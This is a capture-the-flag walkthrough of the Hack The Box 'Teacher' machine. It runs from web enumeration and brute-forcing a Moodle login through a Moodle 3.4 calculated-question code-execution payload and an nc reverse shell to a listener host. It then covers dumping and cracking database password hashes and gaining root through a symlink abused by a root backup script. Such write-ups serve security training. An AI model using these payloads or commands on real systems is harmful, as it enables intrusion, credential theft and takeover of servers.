Teacher

20/04/2019

Teacher is an interesting box, because to get user we will have to exploit a RCE vulnerability in a famous platform most of us had to deal with during our studies, and to escalate privileges we will have to find and understand a certain backup script.


User

Run nmap to see we only have port 80 open with an Apache server running.

root@kali:~/htb/teacher# nmap -sC -sV 10.10.10.153
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 12:18 UTC
Nmap scan report for 10.10.10.153
Host is up (0.37s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

In http://10.10.10.153 we have a school website.

Running gobuster we can see the following directories.

root@kali:~/htb/teacher# /opt/gobuster/gobuster -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.153/

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.153/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/02/19 15:11:40 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/js (Status: 301)
/manual (Status: 301)
/moodle (Status: 301)
/phpmyadmin (Status: 403)
/server-status (Status: 403)
=====================================================
2019/02/19 15:12:38 Finished
=====================================================

If we go to /images we can see a list of images, most of them of pixelated people but theres one (5.png) which gives us an error.

The image "http://10.10.10.153/images/5.png" cannot be displayed because it contains errors.

So let's download it and view its content.

root@kali:~/htb/teacher# wget http://10.10.10.153/images/5.png
root@kali:~/htb/teacher# cat 5.png 
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

Giovanni is talking about his password to enter the moodle platform (/moodle) we also saw with gobuster.

Using burp we can see the POST request format when performing the login action.

We are only missing one character from giovanni's password, so let's use wfuzz to try all the possibilities and see which gives us access. The -L option (follow redirects) is required because this POST request response is a redirection to the page where we know if the credentials were correct. We're also hiding all responses with 1224 words (--hw 1224) because it's the number of words the "invalid credentials" page has.

root@kali:~/htb/teacher# wfuzz -w /usr/share/wordlists/SecLists/Fuzzing/alphanum-case-extra.txt -L -d "anchor=&username=giovanni&password=Th4C00lTheachaFUZZ" --hw 1224 http://10.10.10.153/moodle/login/index.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.1 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.153/moodle/login/index.php
Total requests: 95

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000003:  C=200    296 L	    1257 W	  27569 Ch	  "#"

We now know the correct credentials are giovanni/Th4C00lTheacha# and we can enter to Moodle as a teacher.

To find out the Moodle version I searched for Moodle version fingerprint and found this:

For Moodle sites in English or German (only), if you are a regular teacher with no admin access, you might be able to find your Moodle version by clicking on "Moodle Docs for this page" at the bottom of any Moodle page when logged in.

When visiting the Algebra page (http://10.10.10.153/moodle/course/view.php?id=2) we have the link "Moodle Docs for this page" sends us to http://docs.moodle.org/34/en/course/view/topics, so we're working with 3.4 version.

For Moodle < 3.5.0 there's a remote code execution vulnerability explained here (the video was really helpful).

To exploit it follow the next steps.

Config -> Turn editing on -> Add an activity or resource -> Select Quiz Add -> Fill and save.
Edit quiz -> Add -> a new question -> Select Calculated -> Fill required fields and
Answer 1 formula = /*{a*/`$_GET[0]`;//{x}}
Grade = 100%

Save changes -> Next page

Now if we add a 0 parameter in the URL, the content should be executed in the machine. To test it let's run a single ping against our machine.

&0=(ping -c 1 10.10.16.38)

If we were listening with tcpdump we should have captured that ping request, meaning the RCE worked.

root@kali:~/htb/teacher# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
09:23:53.098921 IP 10.10.10.153 > kali: ICMP echo request, id 903, seq 1, length 64
09:23:53.098931 IP kali > 10.10.10.153: ICMP echo reply, id 903, seq 1, length 64
09:23:53.176647 IP 10.10.10.153 > kali: ICMP echo request, id 905, seq 1, length 64
09:23:53.176657 IP kali > 10.10.10.153: ICMP echo reply, id 905, seq 1, length 64

Now instead of running a ping let's run nc to retrieve a reverse shell

&0=(nc 10.10.16.38 6969 -e /bin/bash)

If we were listening in the specified port we should get a reverse shell as www-data.

root@kali:~/htb/teacher# nc -nlvp 6969
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6969
Ncat: Listening on 0.0.0.0:6969
Ncat: Connection from 10.10.10.153.
Ncat: Connection from 10.10.10.153:38580.
whoami
www-data

Upgrade the shell with python.

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$ 

Looking through the Moodle files, we have config.php with some sql credentials.

www-data@teacher:/var/www/html/moodle$ cat config.php
cat config.php
dbtype    = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
$CFG->prefix    = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8mb4_unicode_ci',
);
...

Connect to the mysql console.

www-data@teacher:/var/www/html/moodle$ mysql -u root -pWelkom1! -D moodle
mysql -u root -pWelkom1! -D moodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 686
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [moodle]> 

We have the following databases.

MariaDB [moodle]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| moodle             |
| mysql              |
| performance_schema |
| phpmyadmin         |
+--------------------+
5 rows in set (0.00 sec)

Inside of moodle database there are hundreds of tables.

MariaDB [moodle]>  tables;
show tables;
+----------------------------------+
| Tables_in_moodle                 |
+----------------------------------+
| mdl_analytics_indicator_calc     |
| mdl_analytics_models             |
| mdl_analytics_models_log         |
| mdl_analytics_predict_samples    |
| mdl_analytics_prediction_actions |
| mdl_analytics_predictions        |
| mdl_analytics_train_samples      |
| mdl_analytics_used_analysables   |
| mdl_analytics_used_files         |
| mdl_assign                       |
| mdl_assign_grades                |
| mdl_assign_overrides             |
| mdl_assign_plugin_config         |
| mdl_assign_submission            |
| mdl_assign_user_flags            |
| mdl_assign_user_mapping          |
| mdl_assignfeedback_comments      |
| mdl_assignfeedback_editpdf_annot |
| mdl_assignfeedback_editpdf_cmnt  |
| mdl_assignfeedback_editpdf_queue |
| mdl_assignfeedback_editpdf_quick |
| mdl_assignfeedback_file          |
| mdl_assignment                   |
| mdl_assignment_submissions       |
| mdl_assignment_upgrade           |
| mdl_assignsubmission_file        |
| mdl_assignsubmission_onlinetext  |
| mdl_auth_oauth2_linked_login     |
| mdl_backup_controllers           |
| mdl_backup_courses               |
| mdl_backup_logs                  |
| mdl_badge                        |
| mdl_badge_backpack               |
| mdl_badge_criteria               |
| mdl_badge_criteria_met           |
| mdl_badge_criteria_param         |
| mdl_badge_external               |
| mdl_badge_issued                 |
| mdl_badge_manual_award           |
| mdl_block                        |
| mdl_block_community              |
| mdl_block_instances              |
| mdl_block_positions              |
| mdl_block_recent_activity        |
| mdl_block_rss_client             |
| mdl_blog_association             |
| mdl_blog_external                |
| mdl_book                         |
| mdl_book_chapters                |
| mdl_cache_filters                |
| mdl_cache_flags                  |
| mdl_capabilities                 |
| mdl_chat                         |
| mdl_chat_messages                |
| mdl_chat_messages_current        |
| mdl_chat_users                   |
| mdl_choice                       |
| mdl_choice_answers               |
| mdl_choice_options               |
| mdl_cohort                       |
| mdl_cohort_members               |
| mdl_comments                     |
| mdl_competency                   |
| mdl_competency_coursecomp        |
| mdl_competency_coursecompsetting |
| mdl_competency_evidence          |
| mdl_competency_framework         |
| mdl_competency_modulecomp        |
| mdl_competency_plan              |
| mdl_competency_plancomp          |
| mdl_competency_relatedcomp       |
| mdl_competency_template          |
| mdl_competency_templatecohort    |
| mdl_competency_templatecomp      |
| mdl_competency_usercomp          |
| mdl_competency_usercompcourse    |
| mdl_competency_usercompplan      |
| mdl_competency_userevidence      |
| mdl_competency_userevidencecomp  |
| mdl_config                       |
| mdl_config_log                   |
| mdl_config_plugins               |
| mdl_context                      |
| mdl_context_temp                 |
| mdl_course                       |
| mdl_course_categories            |
| mdl_course_completion_aggr_methd |
| mdl_course_completion_crit_compl |
| mdl_course_completion_criteria   |
| mdl_course_completion_defaults   |
| mdl_course_completions           |
| mdl_course_format_options        |
| mdl_course_modules               |
| mdl_course_modules_completion    |
| mdl_course_published             |
| mdl_course_request               |
| mdl_course_sections              |
| mdl_data                         |
| mdl_data_content                 |
| mdl_data_fields                  |
| mdl_data_records                 |
| mdl_editor_atto_autosave         |
| mdl_enrol                        |
| mdl_enrol_flatfile               |
| mdl_enrol_lti_lti2_consumer      |
| mdl_enrol_lti_lti2_context       |
| mdl_enrol_lti_lti2_nonce         |
| mdl_enrol_lti_lti2_resource_link |
| mdl_enrol_lti_lti2_share_key     |
| mdl_enrol_lti_lti2_tool_proxy    |
| mdl_enrol_lti_lti2_user_result   |
| mdl_enrol_lti_tool_consumer_map  |
| mdl_enrol_lti_tools              |
| mdl_enrol_lti_users              |
| mdl_enrol_paypal                 |
| mdl_event                        |
| mdl_event_subscriptions          |
| mdl_events_handlers              |
| mdl_events_queue                 |
| mdl_events_queue_handlers        |
| mdl_external_functions           |
| mdl_external_services            |
| mdl_external_services_functions  |
| mdl_external_services_users      |
| mdl_external_tokens              |
| mdl_feedback                     |
| mdl_feedback_completed           |
| mdl_feedback_completedtmp        |
| mdl_feedback_item                |
| mdl_feedback_sitecourse_map      |
| mdl_feedback_template            |
| mdl_feedback_value               |
| mdl_feedback_valuetmp            |
| mdl_file_conversion              |
| mdl_files                        |
| mdl_files_reference              |
| mdl_filter_active                |
| mdl_filter_config                |
| mdl_folder                       |
| mdl_forum                        |
| mdl_forum_digests                |
| mdl_forum_discussion_subs        |
| mdl_forum_discussions            |
| mdl_forum_posts                  |
| mdl_forum_queue                  |
| mdl_forum_read                   |
| mdl_forum_subscriptions          |
| mdl_forum_track_prefs            |
| mdl_glossary                     |
| mdl_glossary_alias               |
| mdl_glossary_categories          |
| mdl_glossary_entries             |
| mdl_glossary_entries_categories  |
| mdl_glossary_formats             |
| mdl_grade_categories             |
| mdl_grade_categories_history     |
| mdl_grade_grades                 |
| mdl_grade_grades_history         |
| mdl_grade_import_newitem         |
| mdl_grade_import_values          |
| mdl_grade_items                  |
| mdl_grade_items_history          |
| mdl_grade_letters                |
| mdl_grade_outcomes               |
| mdl_grade_outcomes_courses       |
| mdl_grade_outcomes_history       |
| mdl_grade_settings               |
| mdl_grading_areas                |
| mdl_grading_definitions          |
| mdl_grading_instances            |
| mdl_gradingform_guide_comments   |
| mdl_gradingform_guide_criteria   |
| mdl_gradingform_guide_fillings   |
| mdl_gradingform_rubric_criteria  |
| mdl_gradingform_rubric_fillings  |
| mdl_gradingform_rubric_levels    |
| mdl_groupings                    |
| mdl_groupings_groups             |
| mdl_groups                       |
| mdl_groups_members               |
| mdl_imscp                        |
| mdl_label                        |
| mdl_lesson                       |
| mdl_lesson_answers               |
| mdl_lesson_attempts              |
| mdl_lesson_branch                |
| mdl_lesson_grades                |
| mdl_lesson_overrides             |
| mdl_lesson_pages                 |
| mdl_lesson_timer                 |
| mdl_license                      |
| mdl_lock_db                      |
| mdl_log                          |
| mdl_log_display                  |
| mdl_log_queries                  |
| mdl_logstore_standard_log        |
| mdl_lti                          |
| mdl_lti_submission               |
| mdl_lti_tool_proxies             |
| mdl_lti_tool_settings            |
| mdl_lti_types                    |
| mdl_lti_types_config             |
| mdl_message                      |
| mdl_message_airnotifier_devices  |
| mdl_message_contacts             |
| mdl_message_popup                |
| mdl_message_processors           |
| mdl_message_providers            |
| mdl_message_read                 |
| mdl_message_working              |
| mdl_messageinbound_datakeys      |
| mdl_messageinbound_handlers      |
| mdl_messageinbound_messagelist   |
| mdl_mnet_application             |
| mdl_mnet_host                    |
| mdl_mnet_host2service            |
| mdl_mnet_log                     |
| mdl_mnet_remote_rpc              |
| mdl_mnet_remote_service2rpc      |
| mdl_mnet_rpc                     |
| mdl_mnet_service                 |
| mdl_mnet_service2rpc             |
| mdl_mnet_session                 |
| mdl_mnet_sso_access_control      |
| mdl_mnetservice_enrol_courses    |
| mdl_mnetservice_enrol_enrolments |
| mdl_modules                      |
| mdl_my_pages                     |
| mdl_oauth2_endpoint              |
| mdl_oauth2_issuer                |
| mdl_oauth2_system_account        |
| mdl_oauth2_user_field_mapping    |
| mdl_page                         |
| mdl_portfolio_instance           |
| mdl_portfolio_instance_config    |
| mdl_portfolio_instance_user      |
| mdl_portfolio_log                |
| mdl_portfolio_mahara_queue       |
| mdl_portfolio_tempdata           |
| mdl_post                         |
| mdl_profiling                    |
| mdl_qtype_ddimageortext          |
| mdl_qtype_ddimageortext_drags    |
| mdl_qtype_ddimageortext_drops    |
| mdl_qtype_ddmarker               |
| mdl_qtype_ddmarker_drags         |
| mdl_qtype_ddmarker_drops         |
| mdl_qtype_essay_options          |
| mdl_qtype_match_options          |
| mdl_qtype_match_subquestions     |
| mdl_qtype_multichoice_options    |
| mdl_qtype_randomsamatch_options  |
| mdl_qtype_shortanswer_options    |
| mdl_question                     |
| mdl_question_answers             |
| mdl_question_attempt_step_data   |
| mdl_question_attempt_steps       |
| mdl_question_attempts            |
| mdl_question_calculated          |
| mdl_question_calculated_options  |
| mdl_question_categories          |
| mdl_question_dataset_definitions |
| mdl_question_dataset_items       |
| mdl_question_datasets            |
| mdl_question_ddwtos              |
| mdl_question_gapselect           |
| mdl_question_hints               |
| mdl_question_multianswer         |
| mdl_question_numerical           |
| mdl_question_numerical_options   |
| mdl_question_numerical_units     |
| mdl_question_response_analysis   |
| mdl_question_response_count      |
| mdl_question_statistics          |
| mdl_question_truefalse           |
| mdl_question_usages              |
| mdl_quiz                         |
| mdl_quiz_attempts                |
| mdl_quiz_feedback                |
| mdl_quiz_grades                  |
| mdl_quiz_overrides               |
| mdl_quiz_overview_regrades       |
| mdl_quiz_reports                 |
| mdl_quiz_sections                |
| mdl_quiz_slots                   |
| mdl_quiz_statistics              |
| mdl_rating                       |
| mdl_registration_hubs            |
| mdl_repository                   |
| mdl_repository_instance_config   |
| mdl_repository_instances         |
| mdl_repository_onedrive_access   |
| mdl_resource                     |
| mdl_resource_old                 |
| mdl_role                         |
| mdl_role_allow_assign            |
| mdl_role_allow_override          |
| mdl_role_allow_switch            |
| mdl_role_assignments             |
| mdl_role_capabilities            |
| mdl_role_context_levels          |
| mdl_role_names                   |
| mdl_role_sortorder               |
| mdl_scale                        |
| mdl_scale_history                |
| mdl_scorm                        |
| mdl_scorm_aicc_session           |
| mdl_scorm_scoes                  |
| mdl_scorm_scoes_data             |
| mdl_scorm_scoes_track            |
| mdl_scorm_seq_mapinfo            |
| mdl_scorm_seq_objective          |
| mdl_scorm_seq_rolluprule         |
| mdl_scorm_seq_rolluprulecond     |
| mdl_scorm_seq_rulecond           |
| mdl_scorm_seq_ruleconds          |
| mdl_search_index_requests        |
| mdl_sessions                     |
| mdl_stats_daily                  |
| mdl_stats_monthly                |
| mdl_stats_user_daily             |
| mdl_stats_user_monthly           |
| mdl_stats_user_weekly            |
| mdl_stats_weekly                 |
| mdl_survey                       |
| mdl_survey_analysis              |
| mdl_survey_answers               |
| mdl_survey_questions             |
| mdl_tag                          |
| mdl_tag_area                     |
| mdl_tag_coll                     |
| mdl_tag_correlation              |
| mdl_tag_instance                 |
| mdl_task_adhoc                   |
| mdl_task_scheduled               |
| mdl_tool_cohortroles             |
| mdl_tool_customlang              |
| mdl_tool_customlang_components   |
| mdl_tool_monitor_events          |
| mdl_tool_monitor_history         |
| mdl_tool_monitor_rules           |
| mdl_tool_monitor_subscriptions   |
| mdl_tool_recyclebin_category     |
| mdl_tool_recyclebin_course       |
| mdl_tool_usertours_steps         |
| mdl_tool_usertours_tours         |
| mdl_upgrade_log                  |
| mdl_url                          |
| mdl_user                         |
| mdl_user_devices                 |
| mdl_user_enrolments              |
| mdl_user_info_category           |
| mdl_user_info_data               |
| mdl_user_info_field              |
| mdl_user_lastaccess              |
| mdl_user_password_history        |
| mdl_user_password_resets         |
| mdl_user_preferences             |
| mdl_user_private_key             |
| mdl_wiki                         |
| mdl_wiki_links                   |
| mdl_wiki_locks                   |
| mdl_wiki_pages                   |
| mdl_wiki_subwikis                |
| mdl_wiki_synonyms                |
| mdl_wiki_versions                |
| mdl_workshop                     |
| mdl_workshop_aggregations        |
| mdl_workshop_assessments         |
| mdl_workshop_assessments_old     |
| mdl_workshop_comments_old        |
| mdl_workshop_elements_old        |
| mdl_workshop_grades              |
| mdl_workshop_grades_old          |
| mdl_workshop_old                 |
| mdl_workshop_rubrics_old         |
| mdl_workshop_stockcomments_old   |
| mdl_workshop_submissions         |
| mdl_workshop_submissions_old     |
| mdl_workshopallocation_scheduled |
| mdl_workshopeval_best_settings   |
| mdl_workshopform_accumulative    |
| mdl_workshopform_comments        |
| mdl_workshopform_numerrors       |
| mdl_workshopform_numerrors_map   |
| mdl_workshopform_rubric          |
| mdl_workshopform_rubric_config   |
| mdl_workshopform_rubric_levels   |
+----------------------------------+
388 rows in set (0.01 sec)

And if we view the contents of mdl_user we have some users with their corresponding passwords.

MariaDB [moodle]> select * from mdl_user;
select * from mdl_user;
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
| id   | auth   | confirmed | policyagreed | deleted | suspended | mnethostid | username    | password                                                     | idnumber | firstname  | lastname | email          | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin  | currentlogin | lastip        | secret | picture | url | description                                                               | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
|    1 | manual |         1 |            0 |       0 |         0 |          1 | guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |          | Guest user |          | root@localhost |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |        |       0 |     | This user is a special user that allows read-only access to some courses. |                 1 |          1 |          0 |           2 |             1 |           0 |           0 |   1530058999 |            0 | NULL     | NULL             | NULL              | NULL       | NULL          |
|    2 | manual |         1 |            0 |       0 |         0 |          1 | admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |          | Admin      | User     | gio@gio.nl     |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059097 | 1530059573 | 1530059097 |   1530059307 | 192.168.206.1 |        |       0 |     |                                                                           |                 1 |          1 |          0 |           1 |             1 |           0 |           0 |   1530059135 |            0 | NULL     |                  |                   |            |               |
|    3 | manual |         1 |            0 |       0 |         0 |          1 | giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |          | Giovanni   | Chhatta  | Giio@gio.nl    |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059681 | 1550655334 | 1550655159 |   1550655250 | 10.10.13.113  |        |       0 |     |                                                                           |                 1 |          1 |          0 |           2 |             1 |           0 |  1530059291 |   1530059291 |            0 |          |                  |                   |            |               |
| 1337 | manual |         0 |            0 |       0 |         0 |          0 | Giovannibak | 7a860966115182402ed06375cf0a22af                             |          |            |          |                |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |        |       0 |     | NULL                                                                      |                 1 |          1 |          0 |           2 |             1 |           0 |           0 |            0 |            0 | NULL     | NULL             | NULL              | NULL       | NULL          |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
4 rows in set (0.00 sec)

Using md5decrypt we can crack that md5 password hash.

7a860966115182402ed06375cf0a22af : expelled 

Now we can change to giovanni using the obtained password.

www-data@teacher:/var/www/html/moodle$ su giovanni
su giovanni
Password: expelled

giovanni@teacher:/var/www/html/moodle$ 

In his home directory we have the user flag.

giovanni@teacher:~$ cat user.txt
cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation

Running pspy we can see a strange script being executed by root (UID=0) every few seconds.

www-data@teacher:/tmp$ ./pspy32s
...
2019/02/20 11:42:01 CMD: UID=0    PID=3273   | /bin/bash /usr/bin/backup.sh 
...

Let's see what does backup.sh do.

giovanni@teacher:/usr/bin$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

What is interesting here is the chmod 777 * -R; command. This is giving full permissions to everyone for everything whats in that directory. Since this is being executed in /home/giovanni/work/tmp (cd /home/giovanni/work;...;cd tmp;) we can create a symbolic link there and the script will give full permissions to what's linked. So let's try to create a symbolic link to / directly.

giovanni@teacher:~/work/tmp$ ln -s / caca

These are the permissions before the script is executed.

giovanni@teacher:~/work/tmp$ ls -la /
ls -la /
total 84
drwxr-xr-x  22 root root  4096 Oct 28 16:36 .
drwxr-xr-x  22 root root  4096 Oct 28 16:36 ..
drwxr-xr-x   2 root root  4096 Oct 28 16:40 bin
drwxr-xr-x   3 root root  4096 Oct 28 16:40 boot
drwxr-xr-x  17 root root  3080 Feb 20 11:34 dev
drwxr-xr-x  84 root root  4096 Oct 28 16:40 etc
drwxr-xr-x   3 root root  4096 Jun 27  2018 home
lrwxrwxrwx   1 root root    29 Oct 28 16:36 initrd.img -> boot/initrd.img-4.9.0-8-amd64
lrwxrwxrwx   1 root root    29 Oct 28 16:36 initrd.img.old -> boot/initrd.img-4.9.0-6-amd64
drwxr-xr-x  15 root root  4096 Jun 27  2018 lib
drwxr-xr-x   2 root root  4096 Jun 27  2018 lib64
drwx------   2 root root 16384 Jun 27  2018 lost+found
drwxr-xr-x   3 root root  4096 Jun 27  2018 media
drwxr-xr-x   2 root root  4096 Jun 27  2018 mnt
drwxr-xr-x   2 root root  4096 Jun 27  2018 opt
dr-xr-xr-x 112 root root     0 Feb 20 11:34 proc
drwx------   3 root root  4096 Nov  4 20:03 root
drwxr-xr-x  18 root root   500 Feb 20 11:34 run
drwxr-xr-x   2 root root  4096 Oct 28 16:40 sbin
drwxr-xr-x   2 root root  4096 Jun 27  2018 srv
dr-xr-xr-x  13 root root     0 Feb 20 11:45 sys
drwxrwxrwt   2 root root  4096 Feb 20 11:45 tmp
drwxr-xr-x  10 root root  4096 Jun 27  2018 usr
drwxr-xr-x  12 root root  4096 Jun 27  2018 var
lrwxrwxrwx   1 root root    26 Oct 28 16:36 vmlinuz -> boot/vmlinuz-4.9.0-8-amd64
lrwxrwxrwx   1 root root    26 Oct 28 16:36 vmlinuz.old -> boot/vmlinuz-4.9.0-6-amd64

And these are the permissions after the execution of the script. Observe how now we can access everywhere.

giovanni@teacher:~/work/tmp$ ls -la /
ls -la /
total 84
drwxrwxrwx  22 root root  4096 Oct 28 16:36 .
drwxrwxrwx  22 root root  4096 Oct 28 16:36 ..
drwxrwxrwx   2 root root  4096 Oct 28 16:40 bin
drwxrwxrwx   3 root root  4096 Oct 28 16:40 boot
drwxrwxrwx  17 root root  3080 Feb 20 11:34 dev
drwxrwxrwx  84 root root  4096 Oct 28 16:40 etc
drwxrwxrwx   3 root root  4096 Jun 27  2018 home
lrwxrwxrwx   1 root root    29 Oct 28 16:36 initrd.img -> boot/initrd.img-4.9.0-8-amd64
lrwxrwxrwx   1 root root    29 Oct 28 16:36 initrd.img.old -> boot/initrd.img-4.9.0-6-amd64
drwxrwxrwx  15 root root  4096 Jun 27  2018 lib
drwxrwxrwx   2 root root  4096 Jun 27  2018 lib64
drwxrwxrwx   2 root root 16384 Jun 27  2018 lost+found
drwxrwxrwx   3 root root  4096 Jun 27  2018 media
drwxrwxrwx   2 root root  4096 Jun 27  2018 mnt
drwxrwxrwx   2 root root  4096 Jun 27  2018 opt
drwxrwxrwx 111 root root     0 Feb 20 11:34 proc
drwxrwxrwx   3 root root  4096 Nov  4 20:03 root
drwxrwxrwx  18 root root   500 Feb 20 11:34 run
drwxrwxrwx   2 root root  4096 Oct 28 16:40 sbin
drwxrwxrwx   2 root root  4096 Jun 27  2018 srv
drwxrwxrwx  13 root root     0 Feb 20 11:45 sys
drwxrwxrwx   2 root root  4096 Feb 20 11:45 tmp
drwxrwxrwx  10 root root  4096 Jun 27  2018 usr
drwxrwxrwx  12 root root  4096 Jun 27  2018 var
lrwxrwxrwx   1 root root    26 Oct 28 16:36 vmlinuz -> boot/vmlinuz-4.9.0-8-amd64
lrwxrwxrwx   1 root root    26 Oct 28 16:36 vmlinuz.old -> boot/vmlinuz-4.9.0-6-amd64

Now we can read root's flag.

giovanni@teacher:/root$ cat root.txt
cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX